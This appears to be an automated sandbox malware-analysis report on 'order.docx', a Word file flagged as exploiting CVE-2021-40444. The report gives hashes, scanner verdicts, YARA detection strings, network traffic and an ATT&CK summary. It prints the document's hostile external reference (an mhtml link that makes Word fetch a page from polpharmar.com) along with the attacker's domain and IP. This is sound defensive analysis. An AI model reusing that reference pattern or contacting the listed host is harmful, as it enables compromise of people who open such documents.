Edit tour

Windows Analysis Report
order.docx

Overview

General Information

Sample Name:	order.docx
Analysis ID:	676557
MD5:	8abea2d6c14af54c6eac09d158554085
SHA1:	3802d9c8b3530fe7b140cbd4a12c3895c46077b2
SHA256:	aa26ed65b5b05b28fa8c56df8c0d87e6bfd8b98f962824293acce14d03cd3412
Tags:	docdocxFollina
Infos:

Detection

CVE-2021-40444

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Detected CVE-2021-40444 exploit

Contains an external reference to another file

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Internet Provider seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1288 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	SUSP_Doc_WordXMLRels_May22	Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard, Wojciech Cieslak	0x39:$a1: <Relationships 0x467:$a2: TargetMode="External" 0x43a:$x1: .html!
document.xml.rels	EXPL_CVE_2021_40444_Document_Rels_XML	Detects indicators found in weaponized documents that exploit CVE-2021-40444	Jeremy Brown / @alteredbytes	0x3f8:$b1: /relationships/oleObject 0x412:$c1: Target="mhtml:http 0x43f:$c2: !x-usc:http 0x467:$c3: TargetMode="External"

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: order.docx

Avira: detected

Multi AV Scanner detection for submitted file

Source: order.docx

ReversingLabs: Detection: 69%

Exploits

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Extracted files from sample: mhtml:http://polpharmar.com/test.html!x-usc:http://polpharmar.com/test.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80

Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com

Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80

Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comIf-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMTConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: THCPROJECTSRO THCPROJECTSRO

Source: ~WRS{FC65F658-05F2-4F35-9C52-226D776E880F}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.html%
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.htmlyX

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45FF0D1D-AF9D-41F4-B5D7-9125F330AE9F}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: polpharmar.com

Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comIf-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMTConnection: Keep-Alive

Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE	Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772

Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: order.docx

ReversingLabs: Detection: 69%

Source: order.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\order.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$order.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR74D1.tmp

Jump to behavior

Source: classification engine

Classification label: mal68.expl.evad.winDOCX@1/20@7/1

Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: order.docx

Initial sample: OLE zip file path = word/media/image1.jpg

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:http://polpharmar.com/test.html!x-usc:http://polpharmar.com/test.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	13 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	2 Non-Application Layer Protocol	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	12 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
order.docx	69%	ReversingLabs	Document-Office.Exploit.CVE-2021-40444
order.docx	100%	Avira	EXP/CVE-2021-40444.Gen

Source	Detection	Scanner	Label
http://polpharmar.com/test.htmlyX	0%	Avira URL Cloud	safe
http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html	0%	Avira URL Cloud	safe
http://polpharmar.com/test.html%	0%	Avira URL Cloud	safe
http://polpharmar.com/test.html	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
polpharmar.com	91.235.116.180	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://polpharmar.com/test.html	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://polpharmar.com/test.htmlyX	~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html	~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://polpharmar.com/test.html%	~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.235.116.180	polpharmar.com	Romania		51177	THCPROJECTSRO	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	676557
Start date and time: 01/08/202210:48:37	2022-08-01 10:48:37 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 4s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	order.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.expl.evad.winDOCX@1/20@7/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
TCP Packets have been reduced to 100
Report size getting too big, too many NtQueryAttributesFile calls found.
VT rate limit hit for: order.docx

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28806523107588966
Encrypted:	false
SSDEEP:	48:I35TRB9NE4co0pOXJL2lgH2SEAFdGJhLeo7dgThb87lrTArRmLRm/H:K5TLchZGJSlnfSdchmtw7pEH
MD5:	69E01CD5678E2F435A5DA3DD7098792D
SHA1:	CD9B07B23BC125CA6AA49FA9ABF57D19D475F488
SHA-256:	4891EF6EBC9EFA8EE67F0B6A02B2C3D4C76D13AF8B23DA56FC5F82F94325EA8D
SHA-512:	FDFB7DC1C79983438B5F5162AA1DAB10B28A6FF4F3D24B1F8E85C0275C449305D8DDF6FA75710CB8E9AA1C3E0FEFE6EB32579782B1E75B7D91A9426102D6A158
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z...S.!.F.L.O...S,...X.F...Fa.q................................?.C.l.+..Y}........5..K.I.T.....i.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

